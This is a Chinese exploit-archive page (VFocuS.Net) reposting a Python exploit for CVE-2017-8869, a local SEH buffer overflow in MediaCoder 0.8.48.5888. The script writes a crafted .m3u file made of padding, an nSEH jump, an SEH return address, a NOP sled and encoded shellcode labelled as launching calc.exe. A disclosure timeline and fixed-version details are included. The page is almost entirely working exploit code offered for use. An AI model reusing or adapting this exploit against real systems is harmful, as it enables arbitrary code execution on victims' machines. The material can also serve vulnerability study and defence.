首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH) 来源：@0xSecured 作者：Muhann4d 发布时间：2017-07-28   #!/usr/bin/python # Exploit Title      : MediaCoder 0.8.48.5888 Local Buffer Overflow (SEH) # CVE                : CVE-2017-8869 # Exploit Author     : Muhann4d @0xSecured # Vendor Homepage    : http://www.mediacoderhq.com # Vulnerable Software: http://www.mediacoderhq.com/mirrors.html?file=MediaCoder-0.8.48.5888.exe # Vulnerable Version : 0.8.48.5888 # Fixed version      : 0.8.49.5890 http://www.mediacoderhq.com/mirrors.html?file=MediaCoder-0.8.49.5890.exe # Category           : Local Buffer Overflow # Tested on OS       : Windows 7 Pro SP1 32bit # How to             : Open MediaCoder then drag & drop the .m3u file in it and then press the START button. #                      or just write click on the .mu3 file .. open with .. MediaCoder # Timeline  : # 2017-05-05: Vulnerability discovered, vendor has been contaced # 2017-05-08: Vendor replied denying it .."I believe this was an old issue and no longer exists in the latest version" # 2017-05-09: A POC sent to the vendor. # 2017-05-11: New version is released. According to http://blog.mediacoderhq.com/changelog/ # 2017-06-26: Exploit released.   print "MediaCoder 0.8.48.5888 Local Exploit By Muhann4d @0xSecured" from struct import pack   junk = "http://" + "\x41" * 361 nseh = pack('<I',0x909006eb) seh = pack('<I',0x66017187) nops= "\x90" * 20 #calc.exe shell=("\xbe\xb6\x06\x32\x7a\xda\xd1\xd9\x74\x24\xf4\x5a\x29\xc9\xb1" "\x31\x31\x72\x13\x03\x72\x13\x83\xea\x4a\xe4\xc7\x86\x5a\x6b" "\x27\x77\x9a\x0c\xa1\x92\xab\x0c\xd5\xd7\x9b\xbc\x9d\xba\x17" "\x36\xf3\x2e\xac\x3a\xdc\x41\x05\xf0\x3a\x6f\x96\xa9\x7f\xee" "\x14\xb0\x53\xd0\x25\x7b\xa6\x11\x62\x66\x4b\x43\x3b\xec\xfe" "\x74\x48\xb8\xc2\xff\x02\x2c\x43\xe3\xd2\x4f\x62\xb2\x69\x16" "\xa4\x34\xbe\x22\xed\x2e\xa3\x0f\xa7\xc5\x17\xfb\x36\x0c\x66" "\x04\x94\x71\x47\xf7\xe4\xb6\x6f\xe8\x92\xce\x8c\x95\xa4\x14" "\xef\x41\x20\x8f\x57\x01\x92\x6b\x66\xc6\x45\xff\x64\xa3\x02" "\xa7\x68\x32\xc6\xd3\x94\xbf\xe9\x33\x1d\xfb\xcd\x97\x46\x5f" "\x6f\x81\x22\x0e\x90\xd1\x8d\xef\x34\x99\x23\xfb\x44\xc0\x29" "\xfa\xdb\x7e\x1f\xfc\xe3\x80\x0f\x95\xd2\x0b\xc0\xe2\xea\xd9" "\xa5\x13\x1a\xd0\x33\x83\x85\x81\x7e\xc9\x35\x7c\xbc\xf4\xb5" "\x75\x3c\x03\xa5\xff\x39\x4f\x61\x13\x33\xc0\x04\x13\xe0\xe1" "\x0c\x70\x67\x72\xcc\x59\x02\xf2\x77\xa6")   junkD = "D" * (2960 - (len(junk + nseh + seh + nops + shell))) exploit = junk + nseh + seh + nops + shell + junkD    try:     file= open("Exploit.m3u",'w')     file.write(exploit)     file.close()     raw_input("\nExploit has been created!\n") except:     print "There has been an Error"   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Microsoft Windows - LNK Shortc ·AudioCoder 0.8.46 - Local Buff ·VICIdial 2.9 RC 1 to 2.13 RC1 ·GitHub Enterprise < 2.8.7 - Re ·IPFire < 2.19 Update Core 110 ·Bittorrent 7.10.0 (Build 43581 ·Razer Synapse 2.20.15.1104 - r ·Jenkins < 1.650 - Java Deseria ·ManageEngine Desktop Central 1 ·DiskBoss Enterprise 8.2.14 - B ·MAWK 1.3.3-17 - Local Buffer O ·Advantech SUSIAccess <= 3.0 -   推荐广告

CopyRight © 2002-2025 VFocuS.Net All Rights Reserved